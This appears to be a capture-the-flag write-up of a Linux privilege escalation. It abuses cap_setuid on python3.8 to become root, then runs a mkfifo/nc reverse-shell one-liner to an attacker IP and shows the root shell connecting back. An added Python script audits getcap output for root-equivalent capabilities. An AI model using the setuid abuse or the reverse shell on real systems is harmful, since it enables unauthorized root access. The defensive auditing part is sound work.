4 privesc
PEAS
Files with capabilities (limited to 50):
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
nathan@cap:~$ python3 -c 'import os; os.setuid(0); os.system("whoami;id;uname -a")'
root
uid=0(root) gid=1001(nathan) groups=1001(nathan)
Linux cap 5.4.0-73-generic #82-Ubuntu SMP Wed Apr 14 17:39:42 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
nathan@cap:~$ python3 -c 'import os; os.setuid(0); os.system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.16.161 7070 >/tmp/f")'
$ rlwrap nc -lvnp 7070
listening on [any] 7070 ...
connect to [10.10.16.161] from (UNKNOWN) [10.10.10.245] 40008
whoami;id
whoami;id
root
uid=0(root) gid=1001(nathan) groups=1001(nathan)
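A defender-side check for the file capability flagged above, added here as an example (not part of the original notes): it parses `getcap -r` style output and reports binaries whose permitted set holds a root-equivalent capability. The capability shortlist, the interpreter-name heuristic and every sample line except the python3.8 entry are assumptions of the example.

```python
import re

# Capabilities treated as root-equivalent (assumed shortlist, not exhaustive).
ROOT_EQUIVALENT = {
    "cap_setuid", "cap_setgid", "cap_sys_admin", "cap_sys_module", "cap_chown",
    "cap_sys_ptrace", "cap_dac_override", "cap_dac_read_search", "cap_fowner",
    "cap_setfcap"}
# Heuristic (assumed): interpreters run arbitrary user code, so a grant is critical.
INTERPRETER = re.compile(r"(python|perl|ruby|php|node|lua)[\d.]*")
# One clause of capability text: "cap_a,cap_b+eip" or "cap_a,cap_b=eip".
CLAUSE = re.compile(r"([a-z0-9_,]+)[+=]([eip]*)")
# Constructed sample; only the python3.8 line is taken from the page.
SAMPLE = """\
Files with capabilities (limited to 50):
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/example-tool cap_dac_override=ep
"""

def parse_getcap_line(line):
    """Return (path, {capability: flags}) for one getcap line, else None."""
    line = line.strip()
    if not line.startswith("/"):
        return None
    # Older libcap prints "/path = caps+eip", newer prints "/path caps=eip".
    path, _, text = line.partition(" = ") if " = " in line else line.rpartition(" ")
    caps = {}
    for names, flags in CLAUSE.findall(text):
        for name in filter(None, names.split(",")):
            caps[name] = caps.get(name, "") + flags
    return (path, caps) if path and caps else None

def audit(getcap_output):
    """List (level, path, risky_caps) for files with root-equivalent grants."""
    findings = []
    parsed = filter(None, map(parse_getcap_line, getcap_output.splitlines()))
    for path, caps in parsed:
        # A grant counts here only if it is in the file's permitted set ("p").
        risky = sorted(c for c, f in caps.items()
                       if c in ROOT_EQUIVALENT and "p" in f)
        if risky:
            name = path.rsplit("/", 1)[-1]
            level = "critical" if INTERPRETER.fullmatch(name) else "review"
            findings.append((level, path, risky))
    return findings

if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print(*finding)
```

On a live host, feed it the output of `getcap -r / 2>/dev/null`; `setcap -r <path>` removes a grant that should not be there.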